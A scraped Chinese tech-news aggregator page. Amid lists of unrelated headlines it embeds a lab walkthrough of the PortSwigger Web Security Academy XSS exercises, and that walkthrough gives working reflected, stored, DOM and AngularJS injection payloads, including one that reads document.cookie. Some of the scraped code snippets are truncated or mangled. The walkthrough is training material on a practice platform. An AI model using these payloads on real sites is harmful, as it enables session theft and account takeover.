最新要闻
- 【环球新要闻】70多岁大爷开40万极氪001买菜 直言此前开的奔驰真是垃圾
- 万茜吐槽自己游戏手法不行!网友发现本人玩的是《剑网3》
- 网易云音乐TV版发福利!150小时电视端会员听歌时长免费领
- 赵长江:腾势D9时速120km轮胎被磕到、车身稳如泰山
- iPhone印度造:要跟我们平分蛋糕!
- AI偷偷写70多篇新闻:数月后才被人发现
- 今日报丨与网易延长半年合作失败 内幕曝光:分手一事错怪暴雪了?
- 贾跃亭下周回国?FF发春节“回家”海报:或暗示将落地中国
- 【新要闻】不到3年狂揽1.41万亿元?抖音怎么做到的?
- 【天天热闻】特效太炸!《王者荣耀》李信新皮肤公布 碾压一念神魔
- 14年合作结束!暴雪网易彻底谈崩 玩家不满:暴雪甩锅被识破
- 紧跟特斯拉、问界!小鹏汽车宣布降价:14.89万元起
- 3000次超长寿命国产闪存 致态512GB SSD到手229元
- 资讯:印度男子得子后去尼泊尔还愿:不幸遭遇空难
- 马斯克曾大赞中国工人能工作到凌晨3点 特斯拉德国工人不干了
- 世界快讯:温州一奔驰越线撞击比亚迪 比亚迪调转180度 车头都快没了
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
环球焦点!portswigger 靶场之 XSS 篇(上)
APPRENTICE
All labs | Web Security Academy (portswigger.net)
1. 将 XSS 反射到 HTML 上下文中,没有编码
XSS payload,自是无需多言
(资料图片)
<script>alert(1)</script>
2. 将 XSS 存储到 HTML 上下文中,没有任何编码
存储型的 XSS 在留言区
3. 文档中的 DOM XSS.使用 source location.search 编写接收器
在搜索查询功能中有基于 DOM 的跨站点脚本漏洞
在搜索框输入"第三个",可以发现,输入的词被放到了 JavaScript 代码中的 img 标签的 src 属性中,插入 XSS 代码的话需要先闭合,使用">
`,分别闭合 img 标签和 src 属性
// 在页面输入"第三个"<script>alert(3)</script><script>alert(3)</script>"> // 插入 XSS 代码第二种方法// 语法:onload,事件在页面载入完成后立即触发,onload="JavaScriptCode"1" onload="alert(3)
// 源代码function trackSearch(query) { document.write("");}
4. 使用 source location.search in innerHTML sink 中的 DOM XSS。
// 在页面输入"第四个"第四个// 插入 XSS 代码第一种方法// 语法:onload,当页面载入完毕后执行 Javascript 代码,该事件不可取消
5. 使用 location.search source 在 jQuery 锚点 href 属性接收器中的 DOM XSS
Href 不仅可以跳转路径,也可以放入 JS 代码
https://0a0000b103823255c2ce2cd0003e00a5.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)
6. 在 jQuery 选择器中使用 hashchange 事件的 DOM 型 XSS
HTML 内联框架元素 () ,它能够将另一个 HTML 页面嵌入到当前页面中。
https://0a99009f0458a280c12dc1a500730025.web-security-academy.net/#// 官方给的答案:
// 源代码$(window).on("hashchange", function(){var post = $("section.blog-list h2:contains(" + decodeURIComponent(window.location.hash.slice(1)) + ")");if (post) post.get(0).scrollIntoView();});
7. 带尖括号编码的反射型 XSS
尖括号被编码,但是引号没有,在搜索框输入内容后,发现输入的内容展示在了 input 标签的 value 属性中。
onmouseover 属性在鼠标指针移至元素之上时触发,几乎可使用于所有 HTML 元素,也就不限于搜索框input
8. 将 XSS 存储到带有双引号 HTML 编码的锚点 href 属性中
评论中输入的内容会成为 a 标签 herf 属性的值
9. 将 XSS 反射到带有尖括号 HTML 编码的 JavaScript 字符串中
输入ABC
发现是出现在了 script 标签中,尝试闭合弹出
var searchTerms = "ABC";document.write("");
构造 Payload";alert(9);//
PRACTITIONER
10. 文档中的 DOM XSS.使用源位置编写接收器.在选择元素内搜索
注入&storeId=<script>alert()</script>
var stores = ["London","Paris","Milan"];var store = (new URLSearchParams(window.location.search)).get("storeId");document.write("");
11. AngularJS 表达式中的 DOM XSS,带有尖括号和双引号HTML 编码
Angular 是一个前端框架,{{ ... }}里头其实就是一个模板表达式,Angular 会对其进行求值并转化为字符串输出。可以放入 JavaScript 脚本
[PayloadsAllTheThings-Github](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS Injection/XSS in Angular.md)
注入:{{constructor.constructor("alert(1)")()}}
Constructor 是一个构造函数
12. 反射式 DOM XSS
13. 存储型 XSS
replace(),如果第一个参数是字符串,则仅替换第一个匹配项
function escapeHTML(html) { return html.replace("<", "<").replace(">", ">");}// 源代码中,通过 replace() 函数,替换第一个匹配项,也就是<>// <代表小于号(<); >代表大于号(>)
-
环球焦点!portswigger 靶场之 XSS 篇(上)
APPRENTICEAlllabs|WebSecurityAcademy(portswigger net)1 将XSS反射到HTML上下文中,没有编码XSSpayload
来源: -
今日热文:学习笔记——Spring管理第三方bean;Spring中Bean的作用域;Spring中Bean的生命周期;Spring中bean的后置处理器;Sp
2023-01-17一、Spring管理druid步骤(1)导入jar包<!--https: mvnrepository com artifact com alibaba druid
来源: 环球焦点!portswigger 靶场之 XSS 篇(上)
每日快播:JavaWeb开发中在服务器常用命令集锦
今日热文:学习笔记——Spring管理第三方bean;Spring中Bean的作用域;Spring中Bean的生命周期;Spring中bean的后置处理器;Sp
程序员同事每天准点下班,原来是用了这6个开发工具
【NAS使用心得】使用Synology Photos管理照片
【环球新要闻】70多岁大爷开40万极氪001买菜 直言此前开的奔驰真是垃圾
万茜吐槽自己游戏手法不行!网友发现本人玩的是《剑网3》
网易云音乐TV版发福利!150小时电视端会员听歌时长免费领
赵长江:腾势D9时速120km轮胎被磕到、车身稳如泰山
iPhone印度造:要跟我们平分蛋糕!
个人使用 sudo 方法
环球视讯!iOS APP上架流程(详细)
焦点观察:聚焦技术与体验极致提升,阿里云视频云连续5年领跑!
还在用 Excel 和 SQL?火山引擎 VeDI 这款产品帮你更快处理数据
AI偷偷写70多篇新闻:数月后才被人发现
今日报丨与网易延长半年合作失败 内幕曝光:分手一事错怪暴雪了?
贾跃亭下周回国?FF发春节“回家”海报:或暗示将落地中国
【新要闻】不到3年狂揽1.41万亿元?抖音怎么做到的?
【天天热闻】特效太炸!《王者荣耀》李信新皮肤公布 碾压一念神魔
JNPF流程审批加签功能讲解
14年合作结束!暴雪网易彻底谈崩 玩家不满:暴雪甩锅被识破
紧跟特斯拉、问界!小鹏汽车宣布降价:14.89万元起
3000次超长寿命国产闪存 致态512GB SSD到手229元
资讯:印度男子得子后去尼泊尔还愿:不幸遭遇空难
马斯克曾大赞中国工人能工作到凌晨3点 特斯拉德国工人不干了
世界快讯:温州一奔驰越线撞击比亚迪 比亚迪调转180度 车头都快没了
环球速读:魔兽国服1月24日关服!暴雪称已提议延期半年 网易拒绝
图书管理系统
天天最新:Educational Codeforces Round 14
每日速读!“抠书式”还原的剧版《三体》获赞!动画版已扑街:豆瓣跌至4.6分
领券还送牙刷!三金西瓜霜牙膏狂促:6支到手23.7元
129元 小米米家保温壶上架:1.8L大容量、6小时保温75℃
国产良心!《光明记忆:无限》推出第三人称模式:女主新皮肤来了
00后女生熬夜关灯玩手机后眼部囊肿:专家科普
luckysheet踩坑记录
使用管控平台管理redis集群
当前视讯!在WPF程序中,使用Freetype显示字体
追光动画十年集大成之作!电影《长安三万里》预告曝光
AI换脸小视频泛滥网络 日本人出手:用AI检测真伪
全球快资讯丨知名经济学家:特斯拉不可能成为苹果那样的赚钱机器
热点!90后女生开比亚迪环游中国:总花费2.3万元 油费+电费还不到3千
每日消息!《流浪地球2》“人类股骨”预告发布:AI技术修复李雪健老师声音
什么是整理书包?整理书包的心得体会
计算机能力是什么意思?计算机能力一般怎么填写?
大量元素是什么意思?大量元素和微量元素有哪些?
管理报表包括哪些?管理报表和财务报表的区别有哪些?
什么是地理位置图?地理位置图用什么软件?
怎么用烤箱烤饼干?用烤箱烤饼干的做法是什么?
焦点热文:冰蝎V4.0流量分析到攻防检测
剑灵武神塔怎么进?剑灵武神塔20层苏向阳怎么打?
安卓手机相册在哪个文件夹?安卓手机相册怎么加密?
appsync是什么意思?如何安装appsync?
安卓系统怎么升级?安卓系统和鸿蒙系统哪个好?
全球热议:微软智能语音大升级:方言念古诗无压力
每日热门:特斯拉、华为问界大降价!李想:他们都得对比理想L8
环球今头条!俩小孩小区内5次放火引燃SUV 专家:熊孩子闯祸家长需兜底
每日时讯!机械硬盘大溃败:去年出货量近乎腰斩
大众、长安“缝合怪”?换代天籁消费者不买账 跌出B级车前十榜
世界热消息:学习笔记——Spring底层IOC实现;Spring依赖注入数值问题;Spring依赖注入方式
速读:FlinkSQL 时间类型转化使用小结
焦点播报:国产科幻巨制!《流浪地球2》预售票房突破4000万
微速讯:动画扑街、电视剧成神 《三体》电影版最新进展公布
嫦娥五号科研成果!中国科学家精确测定月球年龄:20.3亿年
世界快报:迪士尼联名!美特斯邦威羽绒服大促 原价500多现1百多到手
画面震撼!五菱小汽车排队“坐”火车去墨西哥
天天百事通!LibreOJ L6210 「美团 CodeM 决赛」tree
读编程与类型系统笔记09_泛型数据结构
热头条丨17岁少女晒爸爸500元买的奢侈包包遭群讽 含泪反击 结局暖心
天天热资讯!2023年我国新能源汽车销量可达950万辆:全球第一没跑 电池便宜到发指
“U盘之父”朗科房东不好当:腾讯租的15层大楼突然全退了
今日最新!1%超级富豪拿走全球三分之二新财富:穷人越来越多 专家称应财富重分配
全球消息!曾被网友戏称“候机大棚” 佛山机场花2000万改造完成
【新视野】降价后 特斯拉订单数环比涨500%!马斯克赢麻了
盗版阿凡达2合法后!Intel、微软、NV等低调回俄罗斯 身体诚实
环球信息:联想小新Pro 2023魔改140W快充 搭载新一代聚能电池有多强?
滚动:要么卸载、要么盗版!视频平台赚钱只能靠“割韭菜”:你无力反抗?
2个大厂 100亿级 超大流量 红包 架构方案 (史上最全)
VUEX 的使用学习二: state
环球时讯:我的2022
每日时讯!疑似被王思聪殴打者发声:没有赔209万 具体金额闭口不提
天天热推荐:小米最强旗舰!曝小米13 Ultra提供16+512GB版本
天天新动态:小米MIX Fold 2推送MIUI 14稳定版:系统大精简、支持光子引擎
女子网购100根仙女棒 收到100根铁丝:商家一句话噎死人
AMD Zen4锐龙终于要真正便宜了!果断坐等
【天天速看料】洛谷P2294. [HNOI2005] 狡猾的商人
当前关注:轻松解决 CSS 代码都在一行的问题
Cookie 会话身份验证是如何工作的?
世界速看:以太坊签名从数学原理到安全应用
焦点滚动:女子买老陈醋买到“老陈西昔”:雷碧、康帅傅、娃啥啥等山寨货防不胜防
全球观点:国内供不应求的红魔8 Pro亮相海外:配置变了
威武!北京跻身全球百强科技集群前三 研发强度超纽约
世界快资讯:Matplotlib绘制散点图与条形图
全球实时:Hack The Box系列——【Markup】XML外部实体注入(XXE)
算法学习笔记(11): 原根
【全球快播报】ASP.NET Core+Element+SQL Server开发校园图书管理系统(一)
Blazor技术入门
种植牙的高价:被打碎了
为一季度量产做准备!宁德时代申请注册“麒麟电池”商标
MacBook Air迎15岁生日 首次亮相由乔布斯从信封取出
全球报道:市场被国产手游席卷了 日本:课税!